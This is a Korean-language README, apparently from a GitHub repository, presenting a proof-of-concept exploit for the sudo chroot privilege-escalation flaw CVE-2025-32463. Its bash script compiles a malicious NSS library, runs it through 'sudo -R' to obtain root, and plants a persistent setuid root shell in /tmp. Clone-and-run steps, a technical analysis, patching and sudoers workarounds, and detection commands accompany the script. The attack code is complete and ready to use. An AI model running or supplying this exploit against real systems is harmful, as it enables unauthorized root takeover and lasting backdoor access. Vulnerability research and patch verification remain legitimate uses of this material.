
sudo chroot 설계 결함을 대상으로 하는 CVE-2025-32463에 대한 로컬 권한 상승 익스플로잇입니다. 영향을 받는 sudo 버전 1.9.14-1.9.17에 대한 PoC 스크립트, 기술 분석 및 완화 지침을 제공합니다.
CVE-2025-32463은 sudo 1.9.14부터 1.9.17까지의 버전에서 발생하는 심각한 로컬 권한 상승 취약점입니다. 이 취약점은 chroot 옵션 처리 로직의 설계 결함을 악용하여 sudo 권한을 가진 공격자가 루트 액세스로 권한을 상승할 수 있도록 합니다.
이 취약점은 sudo의 보안 검증 프로세스의 타이밍 문제로 인해 발생합니다. pivot_root 함수가 보안 정책 검증 전에 실행되어, 공격자가 sudo가 인증 및 권한 부여에 사용하는 파일 시스템 환경을 조작할 수 있습니다.
nsswitch.conf를 포함한 제어된 chroot 환경을 생성합니다.pivot_root: 프로세스에서 너무 일찍 실행됨set_cmnd_path: 조작된 환경에서 작동함command_matches: 환경 조작으로 인해 보안 검사가 우회됨이 익스플로잇을 사용하기 전에 다음 조건이 충족되었는지 확인하십시오:
git clone https://github.com/KaiHT-Ladiant/CVE-2025-32463
cd CVE-2025-32463
chmod +x cve-2025-32463.sh
./cve-2025-32463.sh
대상 시스템이 취약한지 확인하십시오:
# Check sudo version
sudo --version
# Check sudo privileges
sudo -l
# Look for chroot-related permissions
sudo -l | grep chroot
주요 익스플로잇 스크립트(cve-2025-32463.sh):
#!/bin/bash
# CVE-2025-32463 PoC - Sudo Chroot Privilege Escalation
# Based on research by Rich Mirch @ Stratascale Cyber Research Unit
STAGE=$(mktemp -d /tmp/pentest.stage.XXXXXX)
cd ${STAGE?} || exit 1
cat > pentester.c<<'CEOF'
#include <stdlib.h>
#include <unistd.h>
void woot(void) {
setreuid(0,0);
setregid(0,0);
chdir("/");
system("id > /tmp/pwned_proof.txt");
system("cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash");
execl("/bin/bash", "/bin/bash", NULL);
}
CEOF
mkdir -p pentest/etc libnss_
echo "passwd: /pentester" > pentest/etc/nsswitch.conf
cp /etc/group pentest/etc
gcc -shared -fPIC -Wl,-init,woot -o libnss_/pentester.so.2 pentester.c
echo "[*] Exploiting CVE-2025-32463..."
echo "[*] Attempting privilege escalation..."
sudo -R pentest pentest
# Cleanup
rm -rf ${STAGE?}
성공적인 익스플로잇 후 루트 액세스를 확인하십시오:
# Check current privileges
whoami
# Check proof file
cat /tmp/pwned_proof.txt
# Use setuid bash for persistent root access
/tmp/rootbash -p
sudo를 1.9.17p1 이상으로 업데이트하십시오:
# Ubuntu/Debian
sudo apt update && sudo apt upgrade sudo
# CentOS/RHEL
sudo yum update sudo
# or
sudo dnf update sudo
sudoers에서 chroot 지시문을 제거하십시오 (임시 해결 방법):
# Backup current configuration
sudo cp /etc/sudoers /etc/sudoers.backup
# Remove chroot-related entries
sudo sed -i '/chroot/d' /etc/sudoers
# Verify syntax
sudo visudo -c
익스플로잇 시도를 모니터링하십시오:
# Check for suspicious temporary directories
find /tmp -name "*.stage.*" -type d
# Monitor sudo logs
tail -f /var/log/auth.log | grep sudo
# Look for NSS library compilation
find /tmp -name "libnss_*.so*" -type f
이 취약점은 sudo 실행 흐름의 설계 결함에서 비롯됩니다:
정상적인 예상 흐름:
실제 취약한 흐름:
익스플로잇은 이름 서비스 스위치(NSS) 시스템을 활용합니다:
/etc/nsswitch.conf를 읽습니다.이 익스플로잇은 다음에서 테스트되었습니다:
⚠️ 중요 고지 ⚠️
이 도구는 교육 및 승인된 테스트 목적으로만 제공됩니다.
기여를 환영합니다! 다음을 따라 주십시오:
이 프로젝트는 MIT 라이선스에 따라 라이선스가 부여됩니다. 자세한 내용은 LICENSE 파일을 참조하십시오.
참고: 이 취약점은 중요한 시스템 구성 요소에 영향을 미칩니다. 책임감 있게 사용하고 모든 테스트가 승인되었는지 확인하십시오.